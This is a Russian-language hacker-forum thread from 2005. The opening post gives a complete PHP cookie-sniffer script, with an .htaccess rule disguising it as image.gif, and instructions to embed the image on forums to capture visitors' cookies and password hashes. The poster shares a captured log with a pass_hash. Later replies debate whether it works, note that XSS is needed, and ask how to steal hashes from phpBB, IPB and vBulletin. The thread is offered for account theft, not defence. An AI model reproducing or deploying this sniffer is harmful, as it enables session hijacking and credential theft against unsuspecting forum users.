php sniffer

Discussion in 'PHP' started by degeneration x, 29 Oct 2005.

  1. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    Воруем хэш!

    Подходит для всех форумов.

    1. Регимся на jino-net.ru
    2. Загружаем туда файлы :
    image.gif
    sniff.php
    .htaccess
    log.txt


    Image.gif - любое изображение.
    Sniff.php должен быть след. содержания:

    PHP:
    <?  $log="log.txt";  $file fopen ($log"a+");  $qu=UrlDecode(getenv('QUERY_STRING'));  $ref=UrlDecode(getenv('HTTP_REFERER'));  $ip=getenv('REMOTE_ADDR');  $brow=getenv('HTTP_USER_AGENT');  $upc=getenv('REMOTE_HOST');  $cookie=getenv('HTTP_COOKIE');  $now getdate();   $nowstring=$now['mday'].".".$now['mon'].".".$now['year']." ".$now['hours'].":".$now['minutes'].":".$now['seconds'];  $str="[$nowstring] IP=$ip Cookie=$cookie Browser=$brow REFERER=$ref QUERY=$qu\n";  fputs ($file$str);  fclose($file);  header('Location: image.gif');  ?>
    .htaccess такого содержания:
    Code:
    RewriteEngine On
    RewriteRule image.gif sniff.php
    
    Далее пишем на форуме:
    в тэге IMG пишем линк к image.gif

    На log.txt ставин chmod 777 и всё!
    Куки у нас!
     
    1 person likes this.
  2. w4rd3n

    w4rd3n Banned

    Joined:
    6 Oct 2005
    Messages:
    143
    Likes Received:
    3
    Reputations:
    -4
    оффтоп очень удобное окошко с php кодом...
     
  3. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    <На log.txt ставин chmod 777 и всё!

    Что это значит и как это делать?
     
  4. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    Да ты просто гений! ))))
    Правда это работает так же как и снифак на ачате... но эт неважно!
    А сказать прикол? кроме реферера ничего к тебе не придёт! там должна быть хсс что сразу отметает из 100% 90% =))))
     
  5. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    2Ван никсовая команда chmod... тут он меняет права доступа к файлу
     
  6. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    Да ладно? Ко мне уже приходили куки с форума ipb 2.0.4
     
  7. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    Вот что пришло:
    Code:
    [29.10.2005 23:54:16] IP=[COLOR=Red]xxxxxxx [/COLOR]Cookie=bbmode=0; anonlogin=-1; member_id=2; pass_hash=65ab52b200fdcc7f2c80d60bb1cc9bff; forum_read=a%3A1%3A%7Bi%3A2%3Bi%3A1130599467%3B%7D Browser=Opera/8.50 (Windows NT 5.1; U; ru) REFERER=http://[COLOR=Red]xxxxxxxxxxxxxxxx [/COLOR]QUERY=
     
  8. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    2degeneration x: хз. там понимаешь штука со снифаком какая - когда ты его запихиваешь например в <IMG> тебе необходимо(для получения куксов) прикреплять ещё и document.cookie это можно сделать только с помощью хсс! Ну сам подумай так бы все сайты ломались
     
  9. tester

    tester New Member

    Joined:
    18 Jul 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    на phpbb это не работает
     
    #9 tester, 30 Oct 2005
    Last edited: 30 Oct 2005
  10. w4rd3n

    w4rd3n Banned

    Joined:
    6 Oct 2005
    Messages:
    143
    Likes Received:
    3
    Reputations:
    -4
    Для phpbb эксплойтов просто завались...
     
  11. tester

    tester New Member

    Joined:
    18 Jul 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    и с IPB не приходит не хера путного:) так что не могло чудику прийти pass_hash= сам подписал не бось :D
     
    #11 tester, 30 Oct 2005
    Last edited: 30 Oct 2005
  12. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    :confused: :D
     
    _________________________
  13. Kond4r

    Kond4r Elder - Старейшина

    Joined:
    27 Sep 2005
    Messages:
    100
    Likes Received:
    1
    Reputations:
    0
    Это один из многих способов... Если на форуме можно дать линк на свою аватару, то проблемм нет. А вот если идёт прямая загрузка, то жопа(
     
  14. kolorom

    kolorom Banned

    Joined:
    16 May 2005
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    караул

    Что в любом случае? даже если в поосте дать линк на фотку или из подписи? :confused:

    Шас проверю ...
     
  15. $ZLO$

    $ZLO$ Elder - Старейшина

    Joined:
    15 Jan 2005
    Messages:
    59
    Likes Received:
    3
    Reputations:
    0
    а как можно украсть хеш в локалке?
     
  16. Jenizix

    Jenizix New Member

    Joined:
    2 Nov 2005
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    kolorom, нет... Kond4r имел ввиду када ты можеш в профиле указать линк на твой аватар. имхо.
    $ZLO$, жжош! а отчего хеш то хоть?
     
  17. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    2 страницы бреда.
    Куки будут только с того домена, на котором находится картинка!!!
    В данном случае с сайта, на котором и лежит наша картинки, ну и рефер, что ничего не даст, конечно если повезет, то даст сессию :)
     
  18. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    Green_Bear, давно хотел спросить-помню ты давал какому-то челу совет по взлому fastbb путем xss с аватарой. Так вот как ты говоришь, "Куки будут только с того домена, на котором находится картинка!!!" .Да, это так, в чем я не раз убеждался. Тогда как можно взломать этой xss fastbb, если там аватары загружаются на сервер borda?
     
  19. FHT

    FHT Elder - Старейшина

    Joined:
    21 Sep 2005
    Messages:
    454
    Likes Received:
    212
    Reputations:
    168
    А как спереть хеш от vBulletin 3.5.0???
    Пытался увести с помошью сниффера как описано, но куки не приходят.
     
  20. $ZLO$

    $ZLO$ Elder - Старейшина

    Joined:
    15 Jan 2005
    Messages:
    59
    Likes Received:
    3
    Reputations:
    0
    Во меня этот вопрос тоже интересует.......